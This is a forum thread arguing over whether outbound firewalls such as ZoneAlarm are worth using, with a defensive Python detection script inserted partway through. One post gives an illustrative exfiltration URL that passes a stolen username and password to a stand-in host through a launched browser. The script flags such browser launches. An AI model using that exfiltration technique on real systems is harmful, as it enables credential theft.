
Value of Zone Alarm ?

ejs
Aspiring Hero
Posts: 5,442
Thanks: 631
Fixes: 25
Registered: ‎10-06-2010

Re: Value of Zone Alarm ?

I suppose you haven't heard of http://tooleaky.zensoft.com/ then.
Anotherone
Champion
Posts: 19,107
Thanks: 457
Fixes: 21
Registered: ‎31-08-2007

Re: Value of Zone Alarm ?

Oh dear, some people aren't reading what's been written.
My remarks were qualified in several ways. If I gave the impression that any outbound firewall was 100% effective I apologise, but I did say "that nothing - no AV, no Internet Security package, whatever" is 100% effective. So to be clear, that includes upstream Firewalls.
I'm fairly familiar, as I expect you are, with Steve Gibson's site, those and some other "test" routines and various shortcomings.
However, no virus or malware is likely to solely contain similar code to that which you have exampled (eg. it needs to have a keylogger, search for email addresses, or whatever) as it also needs to be giving the hacker some "useful" data. It would therefore be hoped that it would get detected by antivirus or anti-malware products. I'm also sure that malware writers and hackers will be familiar with such code, although would-be hackers may not be, so why make it easier for them by giving unnecessary prominence to specific code in a public domain. Furthermore considering that was written in 2001 (and based on grc.com as it was then), it no longer reliably tells you about its successful penetration, in fact the reverse, to a non-techie person it can give the false impression that there was no "leak". For these two reasons alone, I consider it irresponsible to highlight such code (by name and/or link) and in a public domain and you ought to delete it from your post. (If you really thought I was unaware of such code you could have sent the link in a PM).
I have no problem with you (or anyone) stressing that upstream firewalls have limited benefits.
No-one should stupidly think that they are going to be 100% protected by any security product. Anti-virus and Anti-Malware software should be kept up to date and full scans run regularly and backups done regularly.
As was mentioned by Reed, an upstream firewall may tell you things you might not otherwise have been aware of. Eg. the tray icon will show traffic (even running that test), which if not expected, indicates something amiss. If you don't allow it to totally configure itself and manually configure it, you can get warnings of potential traffic. Some protection/warning is better than none!
In the case of that test, a techie user may spot that although it can give the wrong answer about its success, if you run a task manager you will see instances of iexplore running that haven't been initiated by the user, also if IE is not the default browser, you can end up with a pop-up reminding you of that and asking if you want to make it the default, again indicating something amiss when you didn't start IE yourself.
ejs
Aspiring Hero
Posts: 5,442
Thanks: 631
Fixes: 25
Registered: ‎10-06-2010

Re: Value of Zone Alarm ?

It's not that I'm not reading what you've written, it's just that I don't agree with all of it.
I wasn't disagreeing with what you'd said about programs not providing 100% protection, but presumably if I'd quoted a part of what you'd said, then you'd complain about it being taken out of context. You suggested that malware would have to have a lot of code, presumably different code to bypass each different firewall it might encounter, and that this would be unlikely. I was just pointing out the malware doesn't need to have some sort of special code to defeat each particular firewall, it could just use your web browser. That particular program I pointed out happens to use Internet Explorer, but perhaps malware wouldn't even need to do that. How about stealing a login and password by just launching the default handler for http URLs and opening http://www.example.com/datacollectorscript.php?stolenusername=abc&stolenpassword=xyz - maybe not particularly subtle, but maybe it doesn't need to be. Oh dear, I suppose I'm going to be in trouble again for assisting malware authors.
I'm not sure you've really taken into consideration the point about for your outbound firewall to protect you from something, that something is already running on your computer. It's already been missed by the user and the anti-virus / anti-malware software, there's not much point hoping it would have been detected by those when they've already missed it.
Suggesting I should remove the link or not even mention its name seems to be a bit of an overreaction. That I might somehow be aiding malware writers who would be reading this forum but can't use a search engine is ridiculous. Perhaps you should get that website shut down, or perhaps ask the IWF or Plusnet to have it blocked so that people can't access it? I was hoping that people would read that website and get an idea of the concept of that program, rather than just wildly run it.
Monitoring upstream traffic, and what processes are running, could be done perfectly well with Windows built-in task manager, or if you want to monitor network activity, perhaps use netstat or TCPView.
The original question was about the value of a firewall like zonealarm, not just whether it might possibly provide some benefit. I think its overall value has to take into consideration the problems we were told it had caused, weighed against any potential benefit, and which of those someone considers to be greater is probably going to be subjective.
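The two cues raised in this thread (a browser instance the user did not start, and the URL it is told to open) can be checked from process-creation records. The following is an added detection example, not part of any poster's message; the record layout, the parent allowlist and the parameter-name hints are assumptions, and the sample records are constructed.

```python
import ntpath
from urllib.parse import urlsplit, parse_qsl

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
# Assumption: parents that normally start a browser for an interactive user.
EXPECTED_PARENTS = BROWSERS | {"explorer.exe"}
# Assumption: parameter-name fragments that suggest credentials in a URL.
SENSITIVE_HINTS = ("user", "login", "pass", "pwd", "token")

# Constructed sample records: (image, parent image, command line). Not real logs.
EVENTS = [
    (r"C:\Program Files\Internet Explorer\iexplore.exe",
     r"C:\Windows\explorer.exe", "iexplore.exe"),
    (r"C:\Program Files\Internet Explorer\iexplore.exe",
     r"C:\Users\a\AppData\Local\Temp\updater.exe",
     'iexplore.exe "http://www.example.com/datacollectorscript.php'
     '?stolenusername=abc&stolenpassword=xyz"'),
    (r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe", r"C:\Windows\explorer.exe",
     "firefox.exe https://www.example.org/search?q=firewall"),
]

def url_in(cmdline):
    """Return the first http(s) URL found on a command line, or None."""
    for tok in cmdline.replace('"', " ").split():
        if tok.lower().startswith(("http://", "https://")):
            return tok
    return None

def review(event):
    """Return a list of findings for one process-creation record."""
    image, parent, cmdline = event
    if ntpath.basename(image).lower() not in BROWSERS:
        return []
    findings = []
    parent_exe = ntpath.basename(parent).lower()
    if parent_exe not in EXPECTED_PARENTS:
        findings.append(f"browser started by unexpected parent {parent_exe}")
    url = url_in(cmdline)
    if url:
        names = [k.lower() for k, _ in
                 parse_qsl(urlsplit(url).query, keep_blank_values=True)]
        hits = sorted(n for n in names if any(h in n for h in SENSITIVE_HINTS))
        if hits:
            findings.append("URL carries credential-like parameters: " + ", ".join(hits))
    return findings

def scan(events):
    """Map record index -> findings, for records that have any."""
    return {i: f for i, e in enumerate(events) if (f := review(e))}
```
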
ReedRichards
Seasoned Pro
Posts: 4,927
Thanks: 145
Fixes: 25
Registered: ‎14-07-2009

Re: Value of Zone Alarm ?

Welcome back, Anotherone, I've been missing you as you have not been around these forums for ages. 
My impression of Anotherone is that he tends to be knowledgeable and to have strongly-voiced opinions.  I often used to disagree with him but then the debate forced us to explore issues in greater depth than might otherwise have happened  - which was a good thing.  I don't recall ever being quoted so favourably by him hitherto.